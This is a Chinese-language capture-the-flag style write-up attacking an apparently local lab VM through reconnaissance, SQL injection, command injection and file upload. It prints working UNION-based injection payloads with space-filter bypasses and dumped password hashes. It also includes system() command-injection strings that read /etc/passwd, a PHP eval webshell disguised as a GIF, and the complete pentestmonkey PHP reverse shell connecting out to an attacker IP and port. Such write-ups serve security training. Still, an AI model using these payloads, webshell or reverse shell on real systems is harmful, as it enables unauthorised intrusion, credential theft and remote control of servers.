文章目录
- 一,信息收集
- 1.网段探测
- 2.端口扫描
- 3.目录扫描
- 二,信息分析
- 三,sql注入
- 1.判断SQL注入
- 2.查询显示位
- 3.查询注入点
- 4.查询库
- 5.查询表
- 6.查字段
- 7. 查user表中的值
- 8.登陆superadmin用户
- 四,漏洞利用
- 文件上传
- 命令执行
- 蚁剑连接
- 五,反弹shell
- 1.上传php木马文件
- 2.本地监听
- 六,提权
一,信息收集
1.网段探测
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.163.28
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.163.152 d2:a6:97:bb:46:9d (Unknown: locally administered)
192.168.163.193 00:0c:29:01:34:57 VMware, Inc.
192.168.163.209 7c:b5:66:a5:f0:a5 Intel Corporate
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 1.946 seconds (131.55 hosts/sec). 3 responded
2.端口扫描
┌──(root㉿kali)-[~]
└─# nmap -Pn 192.168.163.193
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-26 00:43 EST
Nmap scan report for 192.168.163.193
Host is up (0.00056s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:01:34:57 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -p- 192.168.163.193
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-26 00:43 EST
Nmap scan report for 192.168.163.193
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6ba824d6092fc99a8eabbc6e7d4eb9ad (RSA)
| 256 abe84f5338062c6af392e3974a0e3ed1 (ECDSA)
|_ 256 327690b87dfca4326310cd676149d6c4 (ED25519)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.34 (Ubuntu)
MAC Address: 00:0C:29:01:34:57 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.60 seconds
3.目录扫描
┌──(root㉿kali)-[~]
└─# dirsearch -u "http://192.168.163.193" -x 403,404,500
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /root/reports/http_192.168.163.193/_24-02-26_00-44-22.txt
Target: http://192.168.163.193/
[00:44:22] Starting:
[00:44:41] 200 - 0B - /config.php
[00:44:51] 200 - 527B - /login.php
[00:44:52] 302 - 0B - /logout.php -> login.php
[00:45:01] 200 - 594B - /register.php
[00:45:09] 301 - 320B - /uploads -> http://192.168.163.193/uploads/
Task Completed
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://192.168.163.193"
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.163.193
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 320] [--> http://192.168.163.193/uploads/]
/server-status (Status: 403) [Size: 303]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
二,信息分析
访问http://192.168.163.193/login.php,是一个登陆页面,弱密码进不去
通过目录扫描,访问扫http://192.168.163.193//register.php,是一个注册页面,注册账号登陆试试
登陆后,发现是一个查询的页面,猜测有sql注入,不输入任何数据,出现表单
三,sql注入
我是用抓包形式,进行sql注入,个人认为比较方便
1.判断SQL注入
在OSINT后加一个',页面不显示,任何东西,说明有sql注入
在查显示位,猜测有空格过滤
2.查询显示位
空格过滤
/**/
3.查询注入点
search=-OSINT'/**/union/**/select/**/1,2,3#
4.查询库
search=-OSINT'/**/union/**/select/**/1,2,database()#
5.查询表
search=OSINT'/**/union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables/**/where/**/table_schema='webapphacking'#
6.查字段
OSINT'/**/union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_name='users'#
7. 查user表中的值
search=OSINT'/**/union/**/select/**/group_concat(user,":",pasword),2,3/**/from/**/users#
user1:5d41402abc4b2a76b9719d911017c592,
user2:6269c4f71a55b24bad0f0267d9be5508,
user3:0f359740bd1cda994f8b55330c86d845,
test:05a671c66aefea124cc08b76ea6d30bb,
superadmin:2386acb2cf356944177746fc92523983,
test1:05a671c66aefea124cc08b76ea6d30bb,
admin:e64b78fc3bc91bcbc7dc232ba8ec59e0,
asd:e64b78fc3bc91bcbc7dc232ba8ec59e0
https://www.somd5.com/
superadmin/Uncrackable
8.登陆superadmin用户
四,漏洞利用
文件上传
白名单
命令执行
在last name中,发现执行点
空格过滤
system('cat${IFS}/etc/passwd')
system('cat$IFS$1/etc/passwd')
查看uploads目录,因为uploads只能上传图片格式的文件,所有我们上传恶意的图片,然后通过命令执行更改后缀名
system('ls${IFS}-al${IFS}/var/www/html/uploads')
year2020这个是上传的目录
system('ls${IFS}-al${IFS}/var/www/html/uploads/year2020')
上传恶意的图片
GIF89a
<?php @eval($_POST['c']);?>
修改后缀
system('mv${IFS}/var/www/html/uploads/year2020/1.jpg${IFS}/var/www/html/uploads/year2020/1.php')
执行成功后,查看
访问
http://192.168.163.193/uploads/year2020/1.php
蚁剑连接
五,反弹shell
1.上传php木马文件
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.163.209';
$port = 6666;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
2.本地监听
六,提权
呃,这个提权。。。。。。。。。。。
在legacy目录下有一个可执行文件,直接执行,就是root权限